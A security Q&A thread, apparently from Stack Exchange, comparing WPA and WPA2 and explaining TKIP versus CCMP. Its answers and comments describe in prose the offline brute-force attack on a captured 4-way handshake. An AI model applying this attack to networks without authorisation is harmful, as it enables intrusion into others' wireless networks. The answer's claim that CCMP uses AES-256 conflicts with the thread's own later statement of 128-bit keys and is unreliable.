23

What’s the difference between the process of attacking WPA and the process of attacking WPA2?

I know that WPA2 is much more secure than WPA. However, it seems the case that both of them are attacked using the same mechanism — basically, capturing the handshake and then doing brute-force. Are both protocols equally vulnerable to brute-force?

TRiG
  • 609
  • 5
  • 14
Minaj
  • 1,536
  • 2
  • 14
  • 23

2 Answers2

32

WPA was just a quick update to WEP protocol to solve some security problems until the final version of 802.11i standard was delivered.

The message integrity check, per-packet key hashing, broadcast key rotation, sequence counter and key mixing function were updated from WEP in order to patch some of the current vulnerabilities. This is why in some cases, WPA is considered to be a draft of 802.11i standard.

The main difference between WPA and WPA2 is the encryption protocol used:

  • TKIP used by WPA, still uses RC4 cipher as WEP, so apart from the patched vulnerabilities it has some new ones like MIC key recovery and an extended version of chop-chop WEP attack.

  • WPA2 was the final implementation of 802.11i and it introduces a new encryption protocol CCMP. This new protocol uses a stronger cipher AES-256, which represents a huge improvement from RC4.

Aside from this main difference, both WPA and WPA2 uses the same key exchange mechanism. The 4-way handshake is used to exchange encryption keys, so therefore this is why you can attack WPA/WPA2 in the same way, by capturing its handshake and bruteforcing PMK/PTK:

sequence diagram

The attacker tries various passphrases, computes PMK and PTK using those passphrases, and then verifies the MAC in order to check if the passphrase was correct.

Toby Speight
  • 1,214
  • 9
  • 17
z4k4
  • 531
  • 3
  • 6
  • 4
    For a moment I had to stop and think what "chiper" was :) – Martin Argerami Aug 22 '16 at 12:15
  • 15
    @MartinArgerami It's the woodchipper that you're supposed to feed the computer of a developer who thinks they know enough to roll their own crypto. – Nzall Aug 22 '16 at 13:32
  • So TKIP is not an encryption algorithm on its own? Its just some iteration of RC4? – Minaj Aug 22 '16 at 15:41
  • Do both WPA and WPA2 use the same size of encryption key? I am trying to asses if the required brute-force effort is the same in both cases. – Minaj Aug 22 '16 at 15:53
  • @Minaj TKIP is an encryption protocol that IEEE 802.11i task group designed in order to correct the WEP vulnerabilities without requiring to upgrade the hardware. This is why TKIP still uses RC4 cipher, but also some new features where implemented in order to correct the WEP vulnerabilities. This was just a "fast" patch until the new version could be released (WPA2 with CCMP). – z4k4 Aug 22 '16 at 19:42
  • @Minaj WPA with TKIP and WPA2 with CCMP use 128-bit key length. But that doesn't really matter when you try to brute-force 4-way handshake, as this is only the initial negotiation and the ciphers aren't used at this point. The 4-way handshake objective is to authenticate the STA with the AP by proving that both know the PMK. In order to accomplish this the exchange some nonce and from there both calculate PSK that after would be used by each cypher in order to encrypt the traffic. – z4k4 Aug 22 '16 at 20:02
  • Oh this means you are not brute forcing the actual encryption key? The PSK is different from the encryption key? – Minaj Aug 22 '16 at 20:24
  • I know that in WEP the PSK and encryption key are the same. Is this not the case in WPA/WPA2? – Minaj Aug 22 '16 at 20:30
  • Ups sorry just make a mistake in the last comment. With the PMK and the nonce/MAC's exchanged during the 4-way handshake the AP and STA compute PTK not the PSK. – z4k4 Aug 23 '16 at 07:14
  • When you try to brute-force the 4-way handshake, you parse from the captured handshake SP and STA addresses, AP and STA nonce, and EAPOL payload and MIC. Then you try a candidate password from burteforce dictionary as a PSK to compute a PMK. Next you compute PTK with PMK and the nonce and MACs parsed initially. After that you only need to compute MIC and compare with the captured at the beginning to know if the candidate password is the right PSK, if not iterate. – z4k4 Aug 23 '16 at 07:14
  • After the handshake, what inputs are used to compute the AES key for WPA2-AES? Also, after breaking the PSK, I assume one can decrypt packets and find the AES key, right? – Minaj Aug 23 '16 at 08:20
  • I was under the impression that WPA/WPA2 are not encryption protocols, they're just certifications given by some organization. The actual protocols are TKIP and CCMP. A WPA device can support either, but a WPA2 device must support CCMP. – BlueRaja - Danny Pflughoeft Aug 23 '16 at 09:16
  • @BlueRaja-DannyPflughoeft Correct me if i'm wrong but I think no one said WPA/WPA2 are encryption protocols. WPA/WPA2 implement, TKIP and CCMP as data confidentiality and integrity protocols, and also some ciphers as RC4 and AES to provide encryption – z4k4 Aug 23 '16 at 09:40
6

The authentication mechanism is same, but the difference between WPA and WPA2 is the encryption protocol used.

WPA uses the TKIP protocol while WPA2 introduces support for the CCMP protocol.

And it's worth mentioning that timing attacks against TKIP have been successful. check this.

Eibo
  • 2,485
  • 3
  • 19
  • 32